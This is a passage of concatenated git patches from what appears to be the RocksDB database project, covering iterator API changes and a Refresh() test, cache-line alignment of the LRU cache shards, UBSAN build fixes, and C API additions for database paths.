TEST_F(DBIteratorTest, DBIterator4) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 4, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1365,7 +1365,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1387,7 +1387,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 1, options.max_sequential_skip_in_iterations, 0)); + 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1409,7 +1409,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1431,7 +1431,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 3, options.max_sequential_skip_in_iterations, 0)); + 3, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1453,7 +1453,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1475,7 +1475,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 5, options.max_sequential_skip_in_iterations, 0)); + 5, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1497,7 +1497,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 6, options.max_sequential_skip_in_iterations, 0)); + 6, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1517,7 +1517,7 @@ TEST_F(DBIteratorTest, DBIterator5) { internal_iter->Finish(); std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->Seek("b"); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -1546,7 +1546,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1568,7 +1568,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 1, options.max_sequential_skip_in_iterations, 0)); + 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1590,7 +1590,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1612,7 +1612,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 3, options.max_sequential_skip_in_iterations, 0)); + 3, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); } @@ -1630,7 +1630,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1652,7 +1652,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 5, options.max_sequential_skip_in_iterations, 0)); + 5, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1674,7 +1674,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 6, options.max_sequential_skip_in_iterations, 0)); + 6, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1715,7 +1715,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1749,7 +1749,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1789,7 +1789,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1829,7 +1829,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 5, options.max_sequential_skip_in_iterations, 0)); + 5, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1874,7 +1874,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 6, options.max_sequential_skip_in_iterations, 0)); + 6, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1920,7 +1920,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 7, options.max_sequential_skip_in_iterations, 0)); + 7, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1960,7 +1960,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 9, options.max_sequential_skip_in_iterations, 0)); + 9, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2006,7 +2006,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 13, options.max_sequential_skip_in_iterations, 0)); + 13, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2053,7 +2053,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 14, options.max_sequential_skip_in_iterations, 0)); + 14, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2083,7 +2083,7 @@ TEST_F(DBIteratorTest, DBIterator8) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -2113,7 +2113,7 @@ TEST_F(DBIteratorTest, DBIterator9) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2179,7 +2179,7 @@ TEST_F(DBIteratorTest, DBIterator10) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 10, options.max_sequential_skip_in_iterations)); db_iter->Seek("c"); ASSERT_TRUE(db_iter->Valid()); @@ -2218,7 +2218,7 @@ TEST_F(DBIteratorTest, SeekToLastOccurrenceSeq0) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, 0 /* force seek */, 0)); + internal_iter, 10, 0 /* force seek */)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -2246,7 +2246,7 @@ TEST_F(DBIteratorTest, DBIterator11) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 1, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -2272,7 +2272,7 @@ TEST_F(DBIteratorTest, DBIterator12) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, 0, 0)); + internal_iter, 10, 0)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -2309,7 +2309,7 @@ TEST_F(DBIteratorTest, DBIterator13) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 2, 3, 0)); + internal_iter, 2, 3)); db_iter->Seek("b"); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), key); @@ -2337,7 +2337,7 @@ TEST_F(DBIteratorTest, DBIterator14) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 4, 1, 0)); + internal_iter, 4, 1)); db_iter->Seek("b"); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -2376,7 +2376,7 @@ class DBIterWithMergeIterTest : public testing::Test { db_iter_.reset(NewDBIterator(env_, ro_, ImmutableCFOptions(options_), BytewiseComparator(), merge_iter, 8 /* read data earlier than seqId 8 */, - 3 /* max iterators before reseek */, 0)); + 3 /* max iterators before reseek */)); } Env* env_; diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index 90f43ea374d..ea65f3a2603 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -1909,6 +1909,65 @@ TEST_F(DBIteratorTest, DBIteratorSkipRecentDuplicatesTest) { NUMBER_OF_RESEEKS_IN_ITERATION)); } +TEST_F(DBIteratorTest, Refresh) { + ASSERT_OK(Put("x", "y")); + + std::unique_ptr iter(db_->NewIterator(ReadOptions())); + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + ASSERT_OK(Put("c", "d")); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + iter->Refresh(); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("c")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + dbfull()->Flush(FlushOptions()); + + ASSERT_OK(Put("m", "n")); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("c")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + iter->Refresh(); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("c")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("m")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + iter.reset(); +} + } // namespace rocksdb int main(int argc, char** argv) { diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index 4e09f64e9a6..d4ac5281816 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -80,6 +80,13 @@ class Iterator : public Cleanable { // satisfied without doing some IO, then this returns Status::Incomplete(). virtual Status status() const = 0; + // If supported, renew the iterator to represent the latest state. The + // iterator will be invalidated after the call. Not supported if + // ReadOptions.snapshot is given when creating the iterator. + virtual Status Refresh() { + return Status::NotSupported("Refresh() is not supported"); + } + // Property "rocksdb.iterator.is-key-pinned": // If returning "1", this means that the Slice returned by key() is valid // as long as the iterator is not deleted. diff --git a/utilities/date_tiered/date_tiered_db_impl.cc b/utilities/date_tiered/date_tiered_db_impl.cc index b75c077be47..c1b1ceb5ecb 100644 --- a/utilities/date_tiered/date_tiered_db_impl.cc +++ b/utilities/date_tiered/date_tiered_db_impl.cc @@ -378,8 +378,8 @@ Iterator* DateTieredDBImpl::NewIterator(const ReadOptions& opts) { DBImpl* db_impl = reinterpret_cast(db_); auto db_iter = NewArenaWrappedDbIterator( - db_impl->GetEnv(), opts, ioptions_, cf_options_.comparator, - kMaxSequenceNumber, cf_options_.max_sequential_skip_in_iterations, 0); + db_impl->GetEnv(), opts, ioptions_, kMaxSequenceNumber, + cf_options_.max_sequential_skip_in_iterations, 0); auto arena = db_iter->GetArena(); MergeIteratorBuilder builder(cf_options_.comparator, arena); From 216644c61ca4f1176f98bd4ce1c6b4ad9d7c893b Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Mon, 24 Jul 2017 10:41:09 -0700 Subject: [PATCH 029/205] enable UBSAN macro in TARGETS Summary: simply enable the macro in internal build, it wont hurt other sanitizers and will fix UBSAN issues Closes https://github.com/facebook/rocksdb/pull/2625 Differential Revision: D5475897 Pulled By: IslamAbdelRahman fbshipit-source-id: 262c6fd5de3c1906f4b29e55b39110f125f41057 --- TARGETS | 1 + buckifier/targets_cfg.py | 1 + 2 files changed, 2 insertions(+) diff --git a/TARGETS b/TARGETS index 134bb5081d3..c6c0de48bc0 100644 --- a/TARGETS +++ b/TARGETS @@ -18,6 +18,7 @@ rocksdb_compiler_flags = [ "-DROCKSDB_SUPPORT_THREAD_LOCAL", "-DHAVE_SSE42", "-DOS_LINUX", + "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include "-DSNAPPY", "-DZLIB", diff --git a/buckifier/targets_cfg.py b/buckifier/targets_cfg.py index 079b892a75d..836493951ae 100644 --- a/buckifier/targets_cfg.py +++ b/buckifier/targets_cfg.py @@ -22,6 +22,7 @@ "-DROCKSDB_SUPPORT_THREAD_LOCAL", "-DHAVE_SSE42", "-DOS_LINUX", + "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include "-DSNAPPY", "-DZLIB", From 16e03882054fa8c947ca84f30b87e1cd3e929597 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Mon, 24 Jul 2017 10:46:21 -0700 Subject: [PATCH 030/205] LRUCacheShard cache line size alignment Summary: combining #2568 and #2612. Closes https://github.com/facebook/rocksdb/pull/2620 Differential Revision: D5464394 Pulled By: IslamAbdelRahman fbshipit-source-id: 9f71d3058dd6adaf02ce3b2de3a81a1228009778 --- cache/lru_cache.cc | 19 +++++++++++++++++-- cache/lru_cache.h | 42 ++++++++++++++++++++++++++++------------- cache/lru_cache_test.cc | 11 ++++++++++- port/port_posix.cc | 17 +++++++++++++++++ port/port_posix.h | 7 +++++++ port/win/port_win.h | 18 ++++++++++++++++++ 6 files changed, 98 insertions(+), 16 deletions(-) diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index 2a4c0f77a08..f833374e73c 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -22,7 +22,7 @@ namespace rocksdb { -LRUHandleTable::LRUHandleTable() : length_(0), elems_(0), list_(nullptr) { +LRUHandleTable::LRUHandleTable() : list_(nullptr), length_(0), elems_(0) { Resize(); } @@ -100,7 +100,7 @@ void LRUHandleTable::Resize() { } LRUCacheShard::LRUCacheShard() - : usage_(0), lru_usage_(0), high_pri_pool_usage_(0) { + : high_pri_pool_usage_(0), usage_(0), lru_usage_(0) { // Make empty circular linked list lru_.next = &lru_; lru_.prev = &lru_; @@ -233,6 +233,14 @@ void LRUCacheShard::EvictFromLRU(size_t charge, } } +void* LRUCacheShard::operator new(size_t size) { + return rocksdb::port::cacheline_aligned_alloc(size); +} + +void LRUCacheShard::operator delete(void *memblock) { + rocksdb::port::cacheline_aligned_free(memblock); +} + void LRUCacheShard::SetCapacity(size_t capacity) { autovector last_reference_list; { @@ -449,7 +457,14 @@ LRUCache::LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) { num_shards_ = 1 << num_shard_bits; +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable: 4316) // We've validated the alignment with the new operators +#endif shards_ = new LRUCacheShard[num_shards_]; +#if defined(_MSC_VER) +#pragma warning(pop) +#endif SetCapacity(capacity); SetStrictCapacityLimit(strict_capacity_limit); for (int i = 0; i < num_shards_; i++) { diff --git a/cache/lru_cache.h b/cache/lru_cache.h index 5fbe0f26459..2fd44bbce50 100644 --- a/cache/lru_cache.h +++ b/cache/lru_cache.h @@ -148,13 +148,13 @@ class LRUHandleTable { // The table consists of an array of buckets where each bucket is // a linked list of cache entries that hash into the bucket. + LRUHandle** list_; uint32_t length_; uint32_t elems_; - LRUHandle** list_; }; // A single shard of sharded cache. -class LRUCacheShard : public CacheShard { +class ALIGN_AS(CACHE_LINE_SIZE) LRUCacheShard : public CacheShard { public: LRUCacheShard(); virtual ~LRUCacheShard(); @@ -202,6 +202,11 @@ class LRUCacheShard : public CacheShard { // not threadsafe size_t TEST_GetLRUSize(); + // Overloading to aligned it to cache line size + void* operator new(size_t); + + void operator delete(void *); + private: void LRU_Remove(LRUHandle* e); void LRU_Insert(LRUHandle* e); @@ -223,12 +228,6 @@ class LRUCacheShard : public CacheShard { // Initialized before use. size_t capacity_; - // Memory size for entries residing in the cache - size_t usage_; - - // Memory size for entries residing only in the LRU list - size_t lru_usage_; - // Memory size for entries in high-pri pool. size_t high_pri_pool_usage_; @@ -242,11 +241,6 @@ class LRUCacheShard : public CacheShard { // Remember the value to avoid recomputing each time. double high_pri_pool_capacity_; - // mutex_ protects the following state. - // We don't count mutex_ as the cache's internal state so semantically we - // don't mind mutex_ invoking the non-const actions. - mutable port::Mutex mutex_; - // Dummy head of LRU list. // lru.prev is newest entry, lru.next is oldest entry. // LRU contains items which can be evicted, ie reference only by cache @@ -255,7 +249,29 @@ class LRUCacheShard : public CacheShard { // Pointer to head of low-pri pool in LRU list. LRUHandle* lru_low_pri_; + // ------------^^^^^^^^^^^^^----------- + // Not frequently modified data members + // ------------------------------------ + // + // We separate data members that are updated frequently from the ones that + // are not frequently updated so that they don't share the same cache line + // which will lead into false cache sharing + // + // ------------------------------------ + // Frequently modified data members + // ------------vvvvvvvvvvvvv----------- LRUHandleTable table_; + + // Memory size for entries residing in the cache + size_t usage_; + + // Memory size for entries residing only in the LRU list + size_t lru_usage_; + + // mutex_ protects the following state. + // We don't count mutex_ as the cache's internal state so semantically we + // don't mind mutex_ invoking the non-const actions. + mutable port::Mutex mutex_; }; class LRUCache : public ShardedCache { diff --git a/cache/lru_cache_test.cc b/cache/lru_cache_test.cc index 87794fd1617..1b83033c36c 100644 --- a/cache/lru_cache_test.cc +++ b/cache/lru_cache_test.cc @@ -17,7 +17,16 @@ class LRUCacheTest : public testing::Test { ~LRUCacheTest() {} void NewCache(size_t capacity, double high_pri_pool_ratio = 0.0) { - cache_.reset(new LRUCacheShard()); + cache_.reset( +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable: 4316) // We've validated the alignment with the new operators +#endif + new LRUCacheShard() +#if defined(_MSC_VER) +#pragma warning(pop) +#endif + ); cache_->SetCapacity(capacity); cache_->SetStrictCapacityLimit(false); cache_->SetHighPriorityPoolRatio(high_pri_pool_ratio); diff --git a/port/port_posix.cc b/port/port_posix.cc index 59241daff44..ee073a55d3f 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -184,5 +184,22 @@ int GetMaxOpenFiles() { return -1; } +void *cacheline_aligned_alloc(size_t size) { +#if defined (_ISOC11_SOURCE) + return aligned_alloc(CACHE_LINE_SIZE, size); +#elif ( _POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600 || defined(__APPLE__)) + void *m; + errno = posix_memalign(&m, CACHE_LINE_SIZE, size); + return errno ? NULL : m; +#else + return malloc(size); +#endif +} + +void cacheline_aligned_free(void *memblock) { + free(memblock); +} + + } // namespace port } // namespace rocksdb diff --git a/port/port_posix.h b/port/port_posix.h index 72beb0409f3..fe0d42644c4 100644 --- a/port/port_posix.h +++ b/port/port_posix.h @@ -193,6 +193,13 @@ extern void InitOnce(OnceType* once, void (*initializer)()); #endif #endif + +extern void *cacheline_aligned_alloc(size_t size); + +extern void cacheline_aligned_free(void *memblock); + +#define ALIGN_AS(n) alignas(n) + #define PREFETCH(addr, rw, locality) __builtin_prefetch(addr, rw, locality) extern void Crash(const std::string& srcfile, int srcline); diff --git a/port/win/port_win.h b/port/win/port_win.h index bbc5feec31b..1ec09068335 100644 --- a/port/win/port_win.h +++ b/port/win/port_win.h @@ -27,6 +27,7 @@ #include #include #include +#include #include @@ -239,6 +240,23 @@ extern void InitOnce(OnceType* once, void (*initializer)()); #define CACHE_LINE_SIZE 64U #endif + +inline void *cacheline_aligned_alloc(size_t size) { + return _aligned_malloc(CACHE_LINE_SIZE, size); +} + +inline void cacheline_aligned_free(void *memblock) { + _aligned_free(memblock); +} + +// https://gcc.gnu.org/bugzilla/show_bug.cgi?id=52991 for MINGW32 +// could not be worked around with by -mno-ms-bitfields +#ifndef __MINGW32__ +#define ALIGN_AS(n) __declspec(align(n)) +#else +#define ALIGN_AS(n) +#endif + static inline void AsmVolatilePause() { #if defined(_M_IX86) || defined(_M_X64) YieldProcessor(); From a4c42e80075f5dcdf21c33bc63b14af981c8a79a Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Mon, 24 Jul 2017 10:47:19 -0700 Subject: [PATCH 031/205] Fix UBSAN issue of passing nullptr to memcmp Summary: As explained in the comments, Sometimes we create Slice(nullptr, 0) in our code base which cause us to do calls like ``` memcmp(nullptr, "abc", 0); ``` That's fine since the len is equal 0, but UBSAN is not happy about it so disable UBSAN for this function and add an assert instead Closes https://github.com/facebook/rocksdb/pull/2616 Differential Revision: D5458326 Pulled By: IslamAbdelRahman fbshipit-source-id: cfca32abe30f7d8f760c9f77ecd9543dfb1170dd --- include/rocksdb/slice.h | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index fe8dee00f04..d1786dd44da 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -213,8 +213,18 @@ inline bool operator!=(const Slice& x, const Slice& y) { return !(x == y); } +// UBSAN complain that we pass nullptr to memcmp that's fine since +// we always do that for a string of len = 0 +#ifdef ROCKSDB_UBSAN_RUN +#if defined(__clang__) +__attribute__((__no_sanitize__("undefined"))) +#elif defined(__GNUC__) +__attribute__((__no_sanitize_undefined__)) +#endif +#endif inline int Slice::compare(const Slice& b) const { const size_t min_len = (size_ < b.size_) ? size_ : b.size_; + assert((data_ != nullptr && b.data_ != nullptr) || min_len == 0); int r = memcmp(data_, b.data_, min_len); if (r == 0) { if (size_ < b.size_) r = -1; From 1d8aa2961c46538713f37467ca9f72f87173df44 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Mon, 24 Jul 2017 11:28:20 -0700 Subject: [PATCH 032/205] Gcc 7 ParsedInternalKey replace memset with clear function. Summary: I haven't looked to see if a class variable inside a loop like this is always initialised. Closes https://github.com/facebook/rocksdb/pull/2602 Differential Revision: D5475937 Pulled By: IslamAbdelRahman fbshipit-source-id: 8570b308f9a4b49e2a56ccc9e9b84d7c46568c15 --- db/dbformat.h | 6 ++++++ db/write_batch_test.cc | 2 +- java/rocksjni/write_batch_test.cc | 2 +- 3 files changed, 8 insertions(+), 2 deletions(-) diff --git a/db/dbformat.h b/db/dbformat.h index 0ffffc88f22..ed1861cf245 100644 --- a/db/dbformat.h +++ b/db/dbformat.h @@ -84,6 +84,12 @@ struct ParsedInternalKey { ParsedInternalKey(const Slice& u, const SequenceNumber& seq, ValueType t) : user_key(u), sequence(seq), type(t) { } std::string DebugString(bool hex = false) const; + + void clear() { + user_key.clear(); + sequence = 0; + type = kTypeDeletion; + } }; // Return the length of the encoding of "key". diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 4fd156d9bae..4584793abe1 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -60,7 +60,7 @@ static std::string PrintContents(WriteBatch* b) { } for (iter->SeekToFirst(); iter->Valid(); iter->Next()) { ParsedInternalKey ikey; - memset((void*)&ikey, 0, sizeof(ikey)); + ikey.clear(); EXPECT_TRUE(ParseInternalKey(iter->key(), &ikey)); switch (ikey.type) { case kTypeValue: diff --git a/java/rocksjni/write_batch_test.cc b/java/rocksjni/write_batch_test.cc index 0654e01588e..199ad239d79 100644 --- a/java/rocksjni/write_batch_test.cc +++ b/java/rocksjni/write_batch_test.cc @@ -59,7 +59,7 @@ jbyteArray Java_org_rocksdb_WriteBatchTest_getContents( rocksdb::ReadOptions(), &arena)); for (iter->SeekToFirst(); iter->Valid(); iter->Next()) { rocksdb::ParsedInternalKey ikey; - memset(reinterpret_cast(&ikey), 0, sizeof(ikey)); + ikey.clear(); bool parsed = rocksdb::ParseInternalKey(iter->key(), &ikey); if (!parsed) { assert(parsed); From 34112aeffde7f8d63450c0647f16382c2f6b8836 Mon Sep 17 00:00:00 2001 From: kapitan-k Date: Mon, 24 Jul 2017 11:47:34 -0700 Subject: [PATCH 033/205] Added db paths to c Summary: Closes https://github.com/facebook/rocksdb/pull/2613 Differential Revision: D5476064 Pulled By: sagar0 fbshipit-source-id: 6b30a9eacb93a945bbe499eafb90565fa9f1798b --- db/c.cc | 26 ++++++++++++++++++++++++++ db/c_test.c | 21 +++++++++++++++++++++ include/rocksdb/c.h | 9 +++++++++ 3 files changed, 56 insertions(+) diff --git a/db/c.cc b/db/c.cc index 441ffade3b6..e1af3836e6b 100644 --- a/db/c.cc +++ b/db/c.cc @@ -52,6 +52,7 @@ using rocksdb::CompressionType; using rocksdb::WALRecoveryMode; using rocksdb::DB; using rocksdb::DBOptions; +using rocksdb::DbPath; using rocksdb::Env; using rocksdb::EnvOptions; using rocksdb::InfoLogLevel; @@ -382,6 +383,10 @@ struct rocksdb_mergeoperator_t : public MergeOperator { } }; +struct rocksdb_dbpath_t { + DbPath rep; +}; + struct rocksdb_env_t { Env* rep; bool is_default; @@ -2009,6 +2014,16 @@ void rocksdb_options_set_paranoid_checks( opt->rep.paranoid_checks = v; } +void 